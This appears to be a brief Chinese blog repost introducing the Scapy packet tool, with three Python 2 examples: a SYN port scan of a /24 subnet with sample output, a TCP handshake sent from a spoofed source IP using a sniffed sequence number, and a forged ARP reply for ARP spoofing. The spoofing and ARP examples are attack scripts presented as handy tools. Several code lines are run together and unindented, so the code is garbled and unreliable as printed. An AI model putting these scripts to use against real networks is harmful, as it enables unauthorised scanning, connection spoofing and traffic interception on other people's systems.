作者介绍,这是个万能的网络工具,除了可以查看 TCP/IP 各层的报文,还可以发送报文。可以说是一个万能工具,作者嚣张的说, “it can replace hping, 85% of nmap, arpspoof, arp-sk, arping, tcpdump, tethereal, p0f, etc.”。
项目地址:http://www.secdev.org/projects/scapy/
这里只是做一个简单的备份,以后有用再做了解。
下面是一个例子,摘自文档《Ruling the Network with Python》:
#!/usr/bin/env python
import sys
from scapy import * conf.verb=0 if len(sys.argv) != 2:
print "Usage: ./pscan.py <target>"
sys.exit(1)
target=sys.argv[1] p=IP(dst=target)/TCP(dport=80, flags="S")
ans,unans=sr(p, timeout=9) for a in ans:
if a[1].flags == 2:
print a[1].src
效果是对 IP 段进行 80 端口扫描:
detach@luna:~/lab/scapy-0.9.17$ sudo ./pscan.py 192.168.9.0/24
192.168.9.1
192.168.9.2
192.168.9.11
192.168.9.14
还有这个,伪装 IP,给远端地址 TCP 报文(路由器只检查目的地址是否在自己“派送”范围),注意,目的地址不能是本地 IP:
#!/usr/bin/env python
import sys
from scapy import *
conf.verb=0 if len(sys.argv) != 4:
print "Usage: ./spoof.py <target> <spoofed_ip> <port>"
sys.exit(1) target = sys.argv[1]
spoofed_ip = sys.argv[2]
port = int(sys.argv[3]) p1=IP(dst=target,src=spoofed_ip)/TCP(dport=port,sport=5000,flags='S')
send(p1)
print "Okay, SYN sent. Enter the sniffed sequence number now: " seq=sys.stdin.readline()
print "Okay, using sequence number " + seq seq=int(seq[:-1]) p2=IP(dst=target,src=spoofed_ip)/TCP(dport=port,sport=5000,flags='A',ack=seq+1,seq=1)
send(p2) print "Okay, final ACK sent. Check netstat on your target :-)"
或许你还用得到 ARP 欺骗:
p = ARP()
p.op = 2
p.hwsrc = "00:11:22:aa:bb:cc"
p.psrc = spoofed_ip
p.hwdst = "ff:ff:ff:ff:ff:ff"
p.pdst = target
send(p)